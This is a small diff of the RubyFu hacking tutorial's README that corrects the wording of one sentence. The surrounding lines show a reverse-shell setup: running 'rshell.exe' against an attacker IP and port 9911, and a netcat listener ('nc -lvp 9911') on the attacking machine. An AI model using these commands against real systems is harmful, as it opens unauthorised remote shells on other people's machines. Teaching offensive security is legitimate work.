rubyfu/RubyFu/module_0x2__system_kung_fu/README.md

 rshell.exe 192.168.0.14 9911
 ```

-from our attacking machine we already listening on 9911
+from our attacking machine we are already listening on port 9911
 ```
 nc -lvp 9911
 ```